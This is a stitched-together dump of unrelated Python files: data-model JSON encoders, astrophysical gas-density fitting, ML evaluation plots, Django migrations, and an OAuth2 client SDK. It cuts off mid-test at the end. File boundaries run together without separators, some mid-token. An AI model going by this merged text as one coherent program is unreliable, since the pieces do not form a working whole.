ColumnEncoder() json_dict[Table.columns_key] = [column_encoder.default(x) for x in o.columns] if o.measures is not None: measure_encoder = MeasureEncoder() json_dict[Table.measures_key] = [measure_encoder.default(x) for x in o.measures] return json_dict class Measure: name_key = 'name' expression_key = 'expression' formatstring_key = 'formatString' is_hidden_key = 'isHidden' @classmethod def from_dict(cls, dictionary): # name is required if Measure.name_key in dictionary: measure_name = str(dictionary[Measure.name_key]) # name cannot be whitespace if measure_name.isspace(): raise RuntimeError('Measure dict has empty name key value') else: raise RuntimeError('Measure dict has no name key') # expression is required if Measure.expression_key in dictionary: measure_expression = str(dictionary[Measure.expression_key]) # expression cannot be whitespace if measure_expression.isspace(): raise RuntimeError('Measure dict has empty expression key value') else: raise RuntimeError('Measure dict has no expression key') if Measure.formatstring_key in dictionary: measure_formatstring = str(dictionary[Measure.formatstring_key]) else: measure_formatstring = None if Measure.is_hidden_key in dictionary: measure_is_hidden = bool(dictionary[Measure.is_hidden_key]) else: measure_is_hidden = None return Measure(name=measure_name, expression=measure_expression, formatstring=measure_formatstring, is_hidden=measure_is_hidden) def __init__(self, name, expression, formatstring=None, is_hidden=None): self.name = name self.expression = expression self.formatstring = formatstring self.is_hidden = is_hidden class MeasureEncoder(json.JSONEncoder): def default(self, o): json_dict = { Measure.name_key: o.name, Measure.expression_key: o.expression, } if o.formatstring is not None: json_dict[Measure.formatstring_key] = o.formatstring if o.is_hidden is not None: json_dict[Measure.is_hidden_key] = o.is_hidden return json_dict class Column: name_key = 'name' datatype_key = 'dataType' def __init__(self, name, data_type): self.name = name self.data_type = data_type class ColumnEncoder(json.JSONEncoder): def default(self, o): return { Column.name_key: o.name, Column.datatype_key: o.data_type } class Row: def __init__(self, **kwargs): for key in kwargs: setattr(self, key, kwargs[key]) class RowEncoder(json.JSONEncoder): def default(self, o): return o.__dict__ mbeko/moztrap """ Template tags/filters for sorting. """ from django.template import Library register = Library() @register.filter def url(sort, field): return sort.url(field) @register.filter def dir(sort, field): return sort.dir(field) import sherpa.ui as ui import numpy as np import matplotlib.pyplot as plt from mod_gasdensity import * import plotting ''' Functions for fitting the gas density profile ''' def find_nemodeltype(ne_data, tspec_data, optplt=0): ''' Fit all four gas density model options: beta model, cusped beta model, tied double beta model, double beta model. The returned model type is selected by the choosing the model that produces the lowest reduced chi-squared fit, as determined by Levenberg-Marquardt method in sherpa. Args: ----- ne_data (astropy table): observed gas density profile in the form established by set_prof_data() tspec_data (astropy table): observed temperature profile in the form established by set_prof_data() optplt (int): option to plot the fit of the four density models Returns: -------- nemodeltype (string): name of the ne model producing the lowest reduced chi-squared ''' opt_models = ['single_beta', 'cusped_beta', 'double_beta_tied', 'double_beta'] opt_rchisq = [] if optplt == 1: fig1 = plt.figure(1, (8, 8)) fig1.clf() maxy = 0 miny = 999 for ii in range(0, len(opt_models)): nemodel = fitne(ne_data=ne_data, nemodeltype=opt_models[ii], tspec_data=tspec_data) opt_rchisq.append(nemodel['rchisq']) if optplt == 1: if ii == 0: ax0 = fig1.add_subplot(2, 2, ii+1) ax0.set_xscale("log", nonposx='clip') ax0.set_yscale("log", nonposy='clip') if ii == 1: ax1 = fig1.add_subplot(2, 2, ii+1) ax1.set_xscale("log", nonposx='clip') ax1.set_yscale("log", nonposy='clip') if ii == 2: ax2 = fig1.add_subplot(2, 2, ii+1) ax2.set_xscale("log", nonposx='clip') ax2.set_yscale("log", nonposy='clip') if ii == 3: ax3 = fig1.add_subplot(2, 2, ii+1) ax3.set_xscale("log", nonposx='clip') ax3.set_yscale("log", nonposy='clip') # best-fitting density model plotting.plt_densityprof(nemodel=nemodel, ne_data=ne_data, annotations=1) # data plt.errorbar(ne_data['radius'], ne_data['ne'], xerr=[ne_data['radius_lowerbound'], ne_data['radius_upperbound']], yerr=ne_data['ne_err'], marker='o', markersize=2, linestyle='none', color='b') plt.annotate(str(opt_models[ii]), (0.55, 0.9), xycoords='axes fraction') plt.xlabel('r [kpc]') plt.ylabel('$n_{e}$ [cm$^{-3}$]') ymin, ymax = plt.ylim() if ymax > maxy: maxy = ymax if ymin < miny: miny = ymin if optplt == 1: ax0.set_ylim(miny, maxy) ax1.set_ylim(miny, maxy) ax2.set_ylim(miny, maxy) ax3.set_ylim(miny, maxy) plt.tight_layout() opt_rchisq = np.array(opt_rchisq) ind = np.where(opt_rchisq == min(opt_rchisq))[0][0] return opt_models[ind], fig1 def fitne(ne_data, nemodeltype, tspec_data=None): ''' Fits gas number density profile according to selected profile model. The fit is performed using python sherpa with the Levenberg-Marquardt method of minimizing chi-squared . Args: ----- ne_data (astropy table): observed gas density profile in the form established by set_prof_data() tspec_data (astropy table): observed temperature profile in the form established by set_prof_data() Returns: -------- nemodel (dictionary): stores relevant information about the model gas density profile nemodel['type']: ne model type; one of the following: ['single_beta','cusped_beta','double_beta_tied','double_beta'] nemodel['parnames']: names of the stored ne model parameters nemodel['parvals']: parameter values of fitted gas density model nemodel['parmins']: lower error bound on parvals nemodel['parmaxes']: upper error bound on parvals nemodel['chisq']: chi-squared of fit nemodel['dof']: degrees of freedom nemodel['rchisq']: reduced chi-squared of fit nemodel['nefit']: ne model values at radial values matching tspec_data (the observed temperature profile) References: ----------- python sherpa: https://github.com/sherpa/ ''' # remove any existing models and data ui.clean() # load data ui.load_arrays(1, np.array(ne_data['radius']), np.array(ne_data['ne']), np.array(ne_data['ne_err'])) # set guess and boundaries on params given selected model if nemodeltype == 'single_beta': # param estimate betaguess = 0.6 rcguess = 20. # units????? ne0guess = max(ne_data['ne']) # beta model ui.load_user_model(betamodel, "beta1d") ui.add_user_pars("beta1d", ["ne0", "rc", "beta"]) ui.set_source(beta1d) # creates model ui.set_full_model(beta1d) # set parameter values ui.set_par(beta1d.ne0, ne0guess, min=0, max=10.*max(ne_data['ne'])) ui.set_par(beta1d.rc, rcguess, min=0.1, max=max(ne_data['radius'])) ui.set_par(beta1d.beta, betaguess, min=0.1, max=1.) if nemodeltype == 'cusped_beta': # param estimate betaguess = 0.7 rcguess = 5. # [kpc] ne0guess = max(ne_data['ne']) alphaguess = 10. # ???? # beta model ui.load_user_model(cuspedbetamodel, "cuspedbeta1d") ui.add_user_pars("cuspedbeta1d", ["ne0", "rc", "beta", "alpha"]) ui.set_source(cuspedbeta1d) # creates model ui.set_full_model(cuspedbeta1d) # set parameter values ui.set_par(cuspedbeta1d.ne0, ne0guess, min=0.001*max(ne_data['ne']), max=10.*max(ne_data['ne'])) ui.set_par(cuspedbeta1d.rc, rcguess, min=0.1, max=max(ne_data['radius'])) ui.set_par(cuspedbeta1d.beta, betaguess, min=0.1, max=1.) ui.set_par(cuspedbeta1d.alpha, alphaguess, min=0., max=100.) if nemodeltype == 'double_beta': # param estimate ne0guess1 = max(ne_data['ne']) # [cm^-3] rcguess1 = 10. # [kpc] betaguess1 = 0.6 ne0guess2 = 0.01*max(ne_data['ne']) # [cm^-3] rcguess2 = 100. # [kpc] betaguess2 = 0.6 # double beta model ui.load_user_model(doublebetamodel, "doublebeta1d") ui.add_user_pars("doublebeta1d", ["ne01", "rc1", "beta1", "ne02", "rc2", "beta2"]) ui.set_source(doublebeta1d) # creates model ui.set_full_model(doublebeta1d) # set parameter values ui.set_par(doublebeta1d.ne01, ne0guess1, min=0.0001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d.rc1, rcguess1, min=0.1, max=max(ne_data['radius'])) ui.set_par(doublebeta1d.beta1, betaguess1, min=0.1, max=1.) ui.set_par(doublebeta1d.ne02, ne0guess2, min=0.0001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d.rc2, rcguess2, min=10., max=max(ne_data['radius'])) ui.set_par(doublebeta1d.beta2, betaguess2, min=0.1, max=1.) if nemodeltype == 'double_beta_tied': # param estimate ne0guess1 = max(ne_data['ne']) rcguess1 = 10. betaguess1 = 0.6 ne0guess2 = 0.01*max(ne_data['ne']) rcguess2 = 100. # double beta model ui.load_user_model(doublebetamodel_tied, "doublebeta1d_tied") ui.add_user_pars("doublebeta1d_tied", ["ne01", "rc1", "beta1", "ne02", "rc2"]) ui.set_source(doublebeta1d_tied) # creates model ui.set_full_model(doublebeta1d_tied) # set parameter values ui.set_par(doublebeta1d_tied.ne01, ne0guess1, min=0.00001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d_tied.rc1, rcguess1, min=0.1, max=max(ne_data['radius'])) ui.set_par(doublebeta1d_tied.beta1, betaguess1, min=0.1, max=1.) ui.set_par(doublebeta1d_tied.ne02, ne0guess2, min=0.00001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d_tied.rc2, rcguess2, min=10., max=max(ne_data['radius'])) # fit model ui.fit() # fit statistics chisq = ui.get_fit_results().statval dof = ui.get_fit_results().dof rchisq = ui.get_fit_results().rstat # error analysis ui.set_conf_opt("max_rstat", 1e9) ui.conf() parvals = np.array(ui.get_conf_results().parvals) parmins = np.array(ui.get_conf_results().parmins) parmaxes = np.array(ui.get_conf_results().parmaxes) parnames = [str(x).split('.')[1] for x in list(ui.get_conf_results().parnames)] # where errors are stuck on a hard limit, change error to Inf if None in list(parmins): ind = np.where(parmins == np.array(None))[0] parmins[ind] = float('Inf') if None in list(parmaxes): ind = np.where(parmaxes == np.array(None))[0] parmaxes[ind] = float('Inf') # set up a dictionary to contain useful results of fit nemodel = {} nemodel['type'] = nemodeltype nemodel['parnames'] = parnames nemodel['parvals'] = parvals nemodel['parmins'] = parmins nemodel['parmaxes'] = parmaxes nemodel['chisq'] = chisq nemodel['dof'] = dof nemodel['rchisq'] = rchisq # if tspec_data included, calculate value of ne model at the same radius # positions as temperature profile if tspec_data is not None: if nemodeltype == 'double_beta': nefit_arr = doublebetamodel(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] if nemodeltype == 'single_beta': nefit_arr = betamodel(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] if nemodeltype == 'cusped_beta': nefit_arr = cuspedbetamodel(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] if nemodeltype == 'double_beta_tied': nefit_arr = doublebetamodel_tied(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] nemodel['nefit'] = nefit_arr return nemodel gym_conservation/__init__.py # Import the envs module so that envs register themselves import gym_conservation.envs guyingbo/multiproc import time import signal signal.signal(signal.SIGTERM, signal.SIG_IGN) time.sleep(100) import pandas as pd from .yfs import yfs from .stats import get_stats, STATS class Player(object): def __init__(self, player_key, player_id, name, status, team, team_key, eligible_positions, selected_position): self.player_key = player_key self.player_id = player_id self.name = name self.status = status self.team = team self.team_key = team_key self.eligible_positions = eligible_positions self.selected_position = selected_position self._stats = None @classmethod def from_dict(cls, player_dict): return Player( player_dict['player_key'], player_dict['player_id'], player_dict['name']['full'], player_dict.get('status', None), player_dict['editorial_team_full_name'], player_dict['editorial_team_key'], set(v['position'] for v in player_dict['eligible_positions']), player_dict['selected_position'], ) def __str__(self): return "Player[{position}]<{name}>".format( name=self.name, position=self.selected_position ) def __repr__(self): return "Player[{position}]('{name}')".format( name=self.name, position=self.selected_position ) @property def stats(self): if self._stats is None: raise Exception("Haven't computed stats yet") df = pd.DataFrame( data=[[self.name, self.eligible_positions, self.selected_position, date] + s.values() for date, s in self._stats[0].items()], columns=['Name', 'Eligible Positions', 'Position', 'Date'] + STATS ) return df, self._stats[1] def set_stats(self, stats): self._stats = stats def is_out(self): return self.status == 'INJ' or self.status == 'O' lib/evaluate.py import matplotlib import numpy as np import matplotlib.pyplot as plt import sklearn from sklearn.metrics import confusion_matrix, classification_report from sklearn.metrics import precision_recall_curve, plot_precision_recall_curve from sklearn.metrics import average_precision_score import sys import os import config def get_results(y_pred_list, y_test, filename=None, show_plot_PE_MI=True, show_plot_roc=True, show_plot_cm=True, show_plot_pr=True): ''' Input: prediction list from model, y_test. y_test is a 1D Torch array (or 1D numpy for Keras).''' font = {'family' : 'serif', 'weight' : 'normal', 'size' : 15} matplotlib.rc('font', **font) out = y_pred_list # out: output G_X, U_X, log_prob = active_BALD(np.log(out), y_test, 2) if show_plot_PE_MI: start_vis = 0 end_vis = len(y_test) plt.figure(figsize=(12,5)) plt.title('Mean pred, pred_entropy, and MI for samples {from, to}: ' + str(start_vis) + ', ' + str(end_vis)) plt.plot(np.arange(start_vis, end_vis), np.mean(out,axis=0)[start_vis:end_vis,1], 'ko', label='$\hat{y}_{mean}$') plt.plot(np.arange(start_vis, end_vis), y_test[start_vis:end_vis], 'r--', label='${y}_{test}$') plt.plot(np.arange(start_vis, end_vis),G_X[start_vis:end_vis], label='pred_entropy') plt.plot(np.arange(start_vis, end_vis),U_X[start_vis:end_vis], label='MI') plt.xlabel('Feature window') plt.legend() plt.savefig(os.path.join(config.plot_dir, filename + '_PE_MI.pdf' ),bbox_inches='tight') plt.show() if show_plot_roc: roc_score = sklearn.metrics.roc_auc_score(y_test, np.mean(out, axis=0)[:,1]) print("mean ROC AUC:", roc_score) plot_roc("Test performance", y_test, np.mean(out, axis=0)[:,1], roc_score, filename, linestyle='--') auc_list = [] for y in y_pred_list: auc_list.append(sklearn.metrics.roc_auc_score(y_test, y[:,1])) print("std ROC AUC:", np.std(auc_list)) if show_plot_pr: plot_pr("Test performance", y_test, np.mean(out, axis=0)[:,1], filename) if show_plot_cm: # Calculate confusion matricies cm_list = [] for i in np.arange(len(out)): cm_list.append(confusion_matrix(y_test, np.argmax(out[i],-1))) cm = [] for item in cm_list: cm.append(item.astype('float') / item.sum(axis=1)[:, np.newaxis] *100) cm_mean = np.mean(cm, axis = 0) # Convert mean to normalised percentage cm_std = np.std(cm, axis = 0) # Standard deviation also in percentage np.set_printoptions(precision=4) class_names= np.array(['Noise', 'Mozz']) # Plot normalized confusion matrix plot_confusion_matrix(cm_mean, std=cm_std, classes=class_names, filename=filename, normalize=False) # plt.tight_layout() # plt.savefig('Graphs/cm_RF_BNN.pdf', bbox_inches='tight') plt.show() return G_X, U_X, log_prob def active_BALD(out, X, n_classes): log_prob = np.zeros((out.shape[0], X.shape[0], n_classes)) score_All = np.zeros((X.shape[0], n_classes)) All_Entropy = np.zeros((X.shape[0],)) for d in range(out.shape[0]): # print ('Dropout Iteration', d) # params = unflatten(np.squeeze(out[d]),layer_sizes,nn_weight_index) log_prob[d] = out[d] soft_score = np.exp(log_prob[d]) score_All = score_All + soft_score #computing F_X soft_score_log = np.log2(soft_score+10e-15) Entropy_Compute = - np.multiply(soft_score, soft_score_log) Entropy_Per_samp = np.sum(Entropy_Compute, axis=1) All_Entropy = All_Entropy + Entropy_Per_samp Avg_Pi = np.divide(score_All, out.shape[0]) Log_Avg_Pi = np.log2(Avg_Pi+10e-15) Entropy_Avg_Pi = - np.multiply(Avg_Pi, Log_Avg_Pi) Entropy_Average_Pi = np.sum(Entropy_Avg_Pi, axis=1) G_X = Entropy_Average_Pi Average_Entropy = np.divide(All_Entropy, out.shape[0]) F_X = Average_Entropy U_X = G_X - F_X # G_X = predictive entropy # U_X = MI return G_X, U_X, log_prob def plot_roc(name, labels, predictions, roc_score, filename, **kwargs): fp, tp, _ = sklearn.metrics.roc_curve(labels, predictions) plt.figure(figsize=(4,4)) plt.plot(100*fp, 100*tp, label=name, linewidth=2, **kwargs) plt.xlabel('False positives [%]') plt.ylabel('True positives [%]') plt.title(str(roc_score)) # plt.xlim([-0.5,20]) # plt.ylim([80,100.5]) plt.grid(True) ax = plt.gca() ax.set_aspect('equal') plt.savefig(os.path.join(config.plot_dir, filename + '_ROC.pdf' ),bbox_inches='tight') plt.show() def plot_pr(name, labels, predictions, filename): # Plot precision-recall curves area = average_precision_score(labels, predictions) print('PR-AUC: ', area) precision, recall, _ = precision_recall_curve(labels, predictions) plt.plot(recall, precision) plt.title('AUC={0:0.4f}'.format(area)) plt.xlabel('Recall') plt.ylabel('Precision') plt.savefig(os.path.join(config.plot_dir, filename + '_PR.pdf' ),bbox_inches='tight') plt.show() def plot_confusion_matrix(cm, classes, std, filename=None, normalize=False, cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ # std = std * 100 if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] *100 # std = std.astype('float') / std.sum(axis=1)[:, np.newaxis] *100 print("Normalized confusion matrix") else: print('Confusion matrix, as input by user') print(cm) fig, ax = plt.subplots(figsize=(4,4)) im = ax.imshow(cm, interpolation='nearest', cmap=cmap) # ax.figure.colorbar(im, ax=ax) # We want to show all ticks... ax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0]), # ... and label them with the respective list entries xticklabels=classes, yticklabels=classes, ylabel='True label', xlabel='Predicted label') # Rotate the tick labels and set their alignment. plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor") # Loop over data dimensions and create text annotations. fmt = '.2f' if normalize else '.2f' fmt_std = '.2f' thresh = cm.max() / 2. for i in range(cm.shape[0]): for j in range(cm.shape[1]): ax.text(j, i, format(cm[i, j], fmt) + '±' + format(std[i, j], fmt_std), ha="center", va="center", color="white" if cm[i, j] > thresh else "black") fig.tight_layout() plt.savefig(os.path.join(config.plot_dir, filename + '_cm.pdf' )) return ax def get_results_multiclass(y_test_CNN, y_pred_CNN, filename, classes): # First plot the default confusion matrix and save to text file. with open(os.path.join(config.plot_dir, filename + '_cm.txt' ), "w") as text_file: print(classification_report(y_test_CNN, np.argmax(y_pred_CNN, axis=1)), file=text_file) # Now plot multi-class ROC: compute_plot_roc_multiclass(y_test_CNN, y_pred_CNN, filename, classes, title=None) # Plot also precision-recall curves: compute_plot_pr_multiclass(y_test_CNN, y_pred_CNN, filename, classes, title=None) # Calculate confusion matrix cnf_matrix_unnorm = confusion_matrix(y_test_CNN, np.argmax(y_pred_CNN, axis=1)) # Now normalise cnf_matrix = cnf_matrix_unnorm/cnf_matrix_unnorm.sum(1) fig = plt.figure(figsize=(15, 8)) plt.imshow(cnf_matrix, cmap=plt.cm.Blues) #plot confusion matrix grid threshold = cnf_matrix.max() / 2 #threshold to define text color for i in range(cnf_matrix.shape[0]): #print text in grid for j in range(cnf_matrix.shape[1]): plt.text(j-0.2, i, cnf_matrix_unnorm[i,j], color="w" if cnf_matrix[i,j] > threshold else 'black') tick_marks = np.arange(len(classes)) #define labeling spacing based on number of classes plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) plt.ylabel('True label') # plt.title(') plt.xlabel('Predicted label') # plt.colorbar(label='Accuracy') plt.tight_layout() plt.savefig(os.path.join(config.plot_dir, filename + '_MSC_cm.pdf' ),bbox_inches='tight') return fig def compute_plot_roc_multiclass(y_true, y_pred_prob, filename, classes, title=None): '''y_true: non-categorical y label. y_pred_prob: model.predict output of NN. ''' fpr = dict() tpr = dict() roc_auc = dict() for i in range(len(classes)): fpr[i], tpr[i], _ = sklearn.metrics.roc_curve(to_categorical(y_true)[:, i], y_pred_prob[:, i]) roc_auc[i] = sklearn.metrics.auc(fpr[i], tpr[i]) # Compute micro-average ROC curve and ROC area fpr["micro"], tpr["micro"], _ = sklearn.metrics.roc_curve(to_categorical(y_true).ravel(), y_pred_prob.ravel()) roc_auc["micro"] = sklearn.metrics.auc(fpr["micro"], tpr["micro"]) with open(os.path.join(config.plot_dir, filename + '_roc.txt' ), "w") as text_file: print(roc_auc, file=text_file) lw=2 # First aggregate all false positive rates all_fpr = np.unique(np.concatenate([fpr[i] for i in range(len(classes))])) # Then interpolate all ROC curves at this points mean_tpr = np.zeros_like(all_fpr) for i in range(len(classes)): mean_tpr += np.interp(all_fpr, fpr[i], tpr[i]) # Finally average it and compute AUC mean_tpr /= len(classes) fpr["macro"] = all_fpr tpr["macro"] = mean_tpr roc_auc["macro"] = sklearn.metrics.auc(fpr["macro"], tpr["macro"]) # Plot all ROC curves plt.figure() plt.plot(fpr["micro"], tpr["micro"], label='micro-average ROC curve (area = {0:0.3f})' ''.format(roc_auc["micro"]), color='deeppink', linestyle=':', linewidth=4) plt.plot(fpr["macro"], tpr["macro"], label='macro-average ROC curve (area = {0:0.3f})' ''.format(roc_auc["macro"]), color='navy', linestyle=':', linewidth=4) # colors = cycle(['aqua', 'darkorange', 'cornflowerblue']) for i in range(len(classes)): plt.plot(fpr[i], tpr[i], lw=lw, label='{0} (area = {1:0.3f})' ''.format(classes[i], roc_auc[i])) plt.plot([0, 1], [0, 1], 'k--', lw=lw) plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.title(title) plt.legend(loc="lower right") plt.savefig(os.path.join(config.plot_dir, filename + '_MSC_ROC.pdf' ),bbox_inches='tight') plt.show() def compute_plot_pr_multiclass(y_true, y_pred_prob, filename, classes, title=None): # For each class n_classes = 8 precision = dict() recall = dict() average_precision = dict() Y_test = to_categorical(y_true) y_score = y_pred_prob for i in range(n_classes): precision[i], recall[i], _ = precision_recall_curve(Y_test[:, i], y_score[:, i]) average_precision[i] = average_precision_score(Y_test[:, i], y_score[:, i]) # A "micro-average": quantifying score on all classes jointly precision["micro"], recall["micro"], _ = precision_recall_curve(Y_test.ravel(), y_score.ravel()) average_precision["micro"] = average_precision_score(Y_test, y_score, average="micro") with open(os.path.join(config.plot_dir, filename + '_pr.txt' ), "w") as text_file: print(average_precision, file=text_file) plt.figure(figsize=(7, 8)) f_scores = np.linspace(0.2, 0.8, num=4) lines = [] labels = [] for f_score in f_scores: x = np.linspace(0.01, 1) y = f_score * x / (2 * x - f_score) l, = plt.plot(x[y >= 0], y[y >= 0], color='gray', alpha=0.2) plt.annotate('f1={0:0.1f}'.format(f_score), xy=(0.9, y[45] + 0.02)) lines.append(l) labels.append('iso-f1 curves') l, = plt.plot(recall["micro"], precision["micro"], color='gold', lw=2) lines.append(l) labels.append('micro-average (area = {0:0.3f})' ''.format(average_precision["micro"])) for i in range(n_classes): l, = plt.plot(recall[i], precision[i], lw=2) lines.append(l) labels.append('{0} (area = {1:0.3f})' ''.format(classes[i], average_precision[i])) fig = plt.gcf() fig.subplots_adjust(bottom=0.25) plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('Recall') plt.ylabel('Precision') plt.title('Extension of Precision-Recall curve to multi-class') plt.legend(lines, labels, loc='center left', bbox_to_anchor=(1, 0.5)) plt.savefig(os.path.join(config.plot_dir, filename + '_MSC_PR.pdf' ),bbox_inches='tight') # Tools for reshaping data: def to_categorical(y, num_classes=None, dtype='float32'): """Converts a class vector (integers) to binary class matrix. E.g. for use with `categorical_crossentropy`. Args: y: Array-like with class values to be converted into a matrix (integers from 0 to `num_classes - 1`). num_classes: Total number of classes. If `None`, this would be inferred as `max(y) + 1`. dtype: The data type expected by the input. Default: `'float32'`. Returns: A binary matrix representation of the input. The class axis is placed last. Example: >>> a = tf.keras.utils.to_categorical([0, 1, 2, 3], num_classes=4) >>> a = tf.constant(a, shape=[4, 4]) >>> print(a) tf.Tensor( [[1. 0. 0. 0.] [0. 1. 0. 0.] [0. 0. 1. 0.] [0. 0. 0. 1.]], shape=(4, 4), dtype=float32) >>> b = tf.constant([.9, .04, .03, .03, ... .3, .45, .15, .13, ... .04, .01, .94, .05, ... .12, .21, .5, .17], ... shape=[4, 4]) >>> loss = tf.keras.backend.categorical_crossentropy(a, b) >>> print(np.around(loss, 5)) [0.10536 0.82807 0.1011 1.77196] >>> loss = tf.keras.backend.categorical_crossentropy(a, a) >>> print(np.around(loss, 5)) [0. 0. 0. 0.] """ y = np.array(y, dtype='int') input_shape = y.shape if input_shape and input_shape[-1] == 1 and len(input_shape) > 1: input_shape = tuple(input_shape[:-1]) y = y.ravel() if not num_classes: num_classes = np.max(y) + 1 n = y.shape[0] categorical = np.zeros((n, num_classes), dtype=dtype) categorical[np.arange(n), y] = 1 output_shape = input_shape + (num_classes,) categorical = np.reshape(categorical, output_shape) return categorical # For multi-class evaluation for both PyTorch and Keras: -> Used for Keras with evaluate model below def evaluate_model_aggregated(model, X_test, y_test, n_samples): n_classes = 8 preds_aggregated_by_mean = [] y_aggregated_prediction_by_mean = [] y_target_aggregated = [] for idx, recording in enumerate(X_test): n_target_windows = len(recording)//2 # Calculate expected length: discard edge y_target = np.repeat(y_test[idx],n_target_windows) # Create y array of correct length preds = evaluate_model(model, recording, np.repeat(y_test[idx],len(recording)),n_samples) # Sample BNN preds = np.mean(preds, axis=0) # Average across BNN samples preds = preds[:n_target_windows*2,:] # Discard edge case preds = np.mean(preds.reshape(-1,2,n_classes), axis=1) # Average every 2 elements, across n_classes preds_y = np.argmax(preds, axis=1) # Append argmax prediction (label output) y_aggregated_prediction_by_mean.append(preds_y) preds_aggregated_by_mean.append(preds) # Append prob (or log-prob/other space) y_target_aggregated.append(y_target) # Append y_target return np.concatenate(preds_aggregated_by_mean), np.concatenate(y_aggregated_prediction_by_mean), np.concatenate(y_target_aggregated) # Helper function to run evaluate_model_aggregated for Keras models def evaluate_model(model, X_test, y_test, n_samples): all_y_pred = [] for n in range(n_samples): all_y_pred.append(model.predict(X_test)) return all_y_predsrc/profiles/migrations/0014_profile_background.py # -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-08-30 01:12 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('profiles', '0013_auto_20160803_0244'), ] operations = [ migrations.AddField( model_name='profile', name='background', field=models.ImageField(blank=True, null=True, upload_to='profile_background/%Y/%m/%d/', verbose_name='Portada'), ), ] # -*- coding: utf-8 -*- from django.conf.urls import * from django.contrib import admin urlpatterns = patterns('', url(r'^set_language/$', 'django.views.i18n.set_language', {}, name='set_language'), url(r'^admin/', include(admin.site.urls)),) CPSuperstore/FangCloudServicesAppAccessSDK import threading import time import typing import urllib.parse import requests import FCSAppAccess.exceptions as exceptions import FCSAppAccess.models.device_code as device_code_model class FCSAppAccess: url_base = "https://fangcloudservices.pythonanywhere.com/api/v1" def __init__(self, client_id: str, client_secret: str, scope: typing.Union[str, typing.List[str]]): self._client_id = client_id self._client_secret = client_secret self._scope = scope if isinstance(self._scope, str): self._scope = [self._scope] self._access_token = None self._refresh_token = None def get_scope_string(self) -> str: return " ".join(self._scope) def set_access_token(self, access_token: str, refresh_token: str = None): self._access_token = access_token if refresh_token is not None: self._refresh_token = refresh_token def get_tokens(self) -> typing.Tuple[str, str]: return self._access_token, self._refresh_token def get_access_token(self) -> str: return self._access_token def get_refresh_token(self) -> str: return self._refresh_token def _url_encode(self, text: str) -> str: return urllib.parse.quote_plus(str(text)) def client_credentials(self) -> typing.Tuple[str, str]: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "client_credentials", "client_id": self._client_id, "client_secret": self._client_secret, "scope": self.get_scope_string() }) if r.status_code == 400: if r.json()["error"] == "invalid_grant": raise exceptions.InvalidGrantException( "The provided client_id and client_secret do not match an active application" ) self._scope = r.json()["scope"].split(" ") self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] def refresh_token(self) -> typing.Tuple[str, str]: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "refresh_token", "client_id": self._client_id, "access_token": self._access_token, "refresh_token": self._refresh_token }) self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] def get_auth_code_url(self, redirect_uri: str) -> str: return self.url_base + "/oauth2/code?client_id={}&redirect_uri={}&response_type=code&scope={}".format( self._client_id, redirect_uri, self._url_encode(self.get_scope_string()) ) def authorization_code(self, auth_code: str) -> typing.Tuple[str, str]: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "authorization_code", "client_id": self._client_id, "client_secret": self._client_secret, "code": auth_code }) self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] def device_code(self) -> device_code_model.DeviceCode: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "device_code", "client_id": self._client_id, "client_secret": self._client_secret, "scopes": self.get_scope_string() }) return device_code_model.DeviceCode(**r.json()) def device_code_poll(self, device_code: device_code_model.DeviceCode) -> typing.Tuple[str, str]: while True: r = requests.post(self.url_base + "/oauth2", json={ "grant_type": "device_code", "client_id": self._client_id, "client_secret": self._client_secret, "device_code": device_code.device_code }) json = r.json() if r.status_code == 400: if json["error"] == "access_denied": raise exceptions.AccessDeniedException("The client has rejected the request") elif json["error"] == "expired_token": raise exceptions.ExpiredTokenException("The device code you have requested is expired") elif r.status_code == 200: self.set_access_token(r.json()["access_token"], r.json()["refresh_token"]) return r.json()["access_token"], r.json()["refresh_token"] time.sleep(device_code.interval.total_seconds()) def device_code_poll_async(self, device_code: device_code_model.DeviceCode) -> threading.Thread: t = threading.Thread( target=self.device_code_poll, args=(device_code, ), daemon=True, name="FCSAppAccessSDK_DeviceCodePollThread" ) t.start() return t # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. # # Copyright (c) 2014-2019, """ Test of the Verilog parser """ from unittest import TestCase import os from os.path import join, dirname, exists import time import shutil from unittest import mock from vunit.ostools import renew_path from vunit.parsing.verilog.parser import VerilogParser class TestVerilogParser(TestCase): # pylint: disable=too-many-public-methods """ Test of the Verilog parser """ def setUp(self): self.output_path = join(dirname(__file__), "test_verilog_parser_out") renew_path(self.output_path) self.cwd = os.getcwd() os.chdir(self.output_path) def tearDown(self): os.chdir(self.cwd) shutil.rmtree(self.output_path) def test_parsing_empty(self): design_file = self.parse("") self.assertEqual(design_file.modules, []) def test_parse_module(self): modules = self.parse( """\ module true1; my_module hello "module false"; endmodule /* module false */ module true2; // module false endmodule module true3 endmodule """ ).modules self.assertEqual(len(modules), 